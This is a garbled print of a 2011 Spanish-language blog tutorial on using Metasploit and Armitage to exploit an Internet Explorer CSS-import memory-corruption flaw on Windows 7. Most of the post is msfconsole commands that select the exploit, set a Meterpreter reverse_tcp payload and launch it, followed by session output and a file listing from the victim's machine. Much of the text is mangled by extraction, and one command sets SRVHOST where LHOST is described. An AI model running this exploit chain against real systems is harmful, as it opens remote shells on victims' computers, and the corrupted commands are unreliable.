Sei sulla pagina 1di 6

02/03/12

HackNode: Uso de Armitage Metasploit para Windo s 7

Compartir

Informar sobre mal uso

Siguiente blog Crear un blog

Acceder

HackNode
You can hack some stuff too! viernes 28 de enero de 2011 T i e Upda e

U o de A mi age Me a ploi pa a Windo

El siguiente video muestra como utilizar Armitage para ejecutar cdigo arbitrario en un sistema Windows 7. Esta es la descripcin del mdulo utilizado para el exploit:

This module exploits a memory corruption vulnerability within Microsoft\s HTML engine (mshtml). When parsing an HTML page containing a recursive CSS import, a C++ object is deleted and later reused. This leads to arbitrary code execution. This exploit utilizes a combination of heap spraying and the .NET 2.0 mscorie.dll module to bypass DEP and ASLR. This module does not opt-in to ASLR. As such, this module should be reliable on all Windows versions.

Seg ido e

hacknode.blogspot.com/2011/01/uso-de-armitage-metasploit-para- indo s.html

1/6

02/03/12

HackNode: Uso de Armitage Metasploit para Windo s 7

Pa icipa en e e i io
Google F iend Connec

A chi o del blog 2012 (1) 2011 (23) agosto (5) julio (2) junio (2) mayo (1)
Ahora, si queremos realizar el mismo ataque utilizando msfconsole, es muy fcil. En Backtrack 4 R2, nos ubicamos en el directorio framework3 (Metasploit Framework 3: 1 c d/ p e n t e s t / e x p l o i t s / f r a m e w o r k 3
?

marzo (4) febrero (4) enero (5) Encontrada una falla que afecta todas las versione... Uso de Armitage Metasploit para Windows 7 Metasploit Meterpreter Cheat Sheet Reference
2/6

E iniciamos la consola de Metasploit: 1 . / m s f c o n s o l e


?

Luego ejecutamos el siguiente comando para seleccionar el exploit: 1 u s ew i n d o w s / b r o w s e r / m s 1 1 _ x x x _ i e _ c s s _ i m p o r t


?

hacknode.blogspot.com/2011/01/uso-de-armitage-metasploit-para- indo s.html

02/03/12

HackNode: Uso de Armitage Metasploit para Windo s 7

Definimos el parmetro SRVHOST con nuestra direccin IP: 1 s e tS V R H O S T12 . 1 6. 1 . 2 3


?

Twitt Metasploit Plugin en Ubuntu Bypass de Windows UAC en Metasploit 2010 (2)

Definimos el parmetro URIPATH: 1 s e tU R I P A T H/


?

Seleccionamos el PAYLOAD a utilizar: 1 s e tP A Y L O A Dw i n d o w s / m e t e r p r e t e r / r e v e r s e _ t c p


?

Da o pe

onale Da kOpe a o

Definimos el parmetro LHOST con nuestra direccin IP: 1 s e tS V R H O S T12 . 1 6. 1 . 2 3


?

Lanzamos el exploit: 1 e x p l o i t
?

Alpha_Geek/Daddy/Ethical_Ha cker/InfoSec_Professional/Co mic_Fanboy/Clone_Trooper Ver todo mi perfil

El resultado debe mostrar lo siguiente: [ * ]1 9 2 . 1 6 8 . 1 . 1 0 0 : 4 3 4 8 7R e c e ie d e e [ * ]1 9 2 . 1 6 8 . 1 . 1 0 0 : 4 3 4 8 7S ed ig id e d ie c [ * ]1 9 2 . 1 6 8 . 1 . 1 0 0 : 4 3 4 8 7R e c e ie d e e [ * ]1 9 2 . 1 6 8 . 1 . 1 0 0 : 4 3 4 8 7S ed ig id H T M L [ * ]1 9 2 . 1 6 8 . 1 . 1 0 0 : 4 3 4 8 7R e c e ie d e e d " [ * ]1 9 2 . 1 6 8 . 1 . 1 0 0 : 4 3 4 8 7S ed ig id . N E TD L L [ * ]1 9 2 . 1 6 8 . 1 . 1 0 0 : 4 3 4 9 4R e c e ie d e e 3 4 1 \ 2 0 1 \ 2 3 2 "


hacknode.blogspot.com/2011/01/uso-de-armitage-metasploit-para- indo s.html 3/6

f / b f / b f / b f

" / " e/ 1 1 _ " / D d . h _ i e _ c _ i " _ i e _ c _ i

e/ 1 1 _

" / g eei c 1 2 9 6 2 3 3 6 5 9 . e/ 1 1 _ _ i e _ c _ i

" / \ 3 5 6 \ 2 0 0 \ 2 4 0 \ 3 4 1 \ 2 0

1 \ 2 3 2 \ 3 5 6 \ 2 0 0 \ 2 4 0 \ 3 4 1 \ 2 0 1 \ 2 3 2 \ 3 5 6 \ 2 0 0 \ 2 4 0 \ 3 4 1 \ 2 0 1 \ 2 3 2 \ 3 5 6 \ 2 0 0 \ 2 4 0 \

02/03/12

HackNode: Uso de Armitage Metasploit para Windo s 7

[ * ]1 9 2 . 1 6 8 . 1 . 1 0 0 : 4 3 4 9 4S ed ig id C S S [ * ]S ed ig [ * ]M ee [ * ]S e i [ * ]C e a g e( 7 4 9 0 5 6b e) e i 1

/ b

e/ 1 1 _

_ i e _ c _ i

1 9 2 . 1 6 8 . 1 . 1 0 0

ee

ee d( 1 9 2 . 1 6 8 . 1 . 1 0 0 : 4 4 4 4>1 9 2 . 1 6 8 . 1 . c e

1 0 0 : 3 7 0 3 0 )a FiJ a 2 81 7 : 5 4 : 4 3+ 0 1 0 02 0 1 1 I D1( 1 9 2 . 1 6 8 . 1 . 1 0 0 : 4 4 4 4>1 9 2 . 1 6 8 . 1 . 1 0 0 : 3 7 0 3 0 ) R S ci 'i gaef ' e . ee( 3 6 6 8 ) c e . . . e e c e :i e ea d . eeh c e c e : I D2 2 0 4 ea d . ee( 2 2 0 4 ) igIii aA [ * ]Sa iga [ * ]M i gaigi [ * ]N e e e

A partir de ese momento ya se tiene activa la sesin en el equipo vctima, con los mismos permisos que el usuario afectado y por eso la permanente necesidad de utilizar el sistema con permisos restringidos, sobre todo si se trata de un entorno corporativo. fe i( 1 1 _ _ i e _ c _ i )> e i L

A cie e i = = = = = = = = = = = = = = = I d T e - 1 ee ee 7 : 4 4 4 4>1 9 2 . 1 6 8 . 1 . 3 2 : 4 9 1 6 1 If ai C e ci

8 6 /i3 2 ba cb \ Jh @B L A C K B O X 1 9 2 . 1 6 8 . 1 . 1

fe

i( 1 1 _

_ i e _ c _ i

)> e i

Ya podremos utilizar la sesin establecida en el equipo vctima, por ejemplo para realizar un listado de archivos:

hacknode.blogspot.com/2011/01/uso-de-armitage-metasploit-para- indo s.html

4/6

02/03/12

HackNode: Uso de Armitage Metasploit para Windo s 7

ee

ee >

L i ig :C : \ Ue \ Jh\ Dc e = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = Md e 4 0 5 5 5 /- - 4 0 7 7 7 / 4 0 7 7 7 / i c 4 0 7 7 7 / i c i d e 1 0 0 6 6 6 / - - - 4 0 2 . ii f i M J a 1 70 1 : 5 9 : 5 40 5 0 02 0 1 1 d e e 0 d i M J a 1 70 1 : 5 8 : 3 90 5 0 02 0 1 1 M V 4 0 7 7 7 / 0 d i M J a 1 70 1 : 5 8 : 3 90 5 0 02 0 1 1 M P S ie T e L a 0 0 0 d i d i d i M M M d i f i e d N ae -

- - -

J a 1 70 1 : 5 9 : 5 40 5 0 02 0 1 1 . J a 1 70 1 : 5 9 : 5 40 5 0 02 0 1 1 . . J a 1 70 1 : 5 8 : 3 90 5 0 02 0 1 1 M M

Es necesario tener en cuenta que la mayora de los antivirus ya detectan el exploit utilizado por Metasploit (el original) por lo que si la vctima ingresa a la URL con el antivirus habilitado es posible que este detecte el ataque. Publicado por DarkOperator en 22:14
1 pe ona ha

Entrada ms reciente

Pgina principal

Entrada antigua

hacknode.blogspot.com/2011/01/uso-de-armitage-metasploit-para- indo s.html

5/6

02/03/12

HackNode: Uso de Armitage Metasploit para Windo s 7

Plantilla Awesome Inc.. Con la tecnologa de Blogger.

hacknode.blogspot.com/2011/01/uso-de-armitage-metasploit-para- indo s.html

6/6

Potrebbero piacerti anche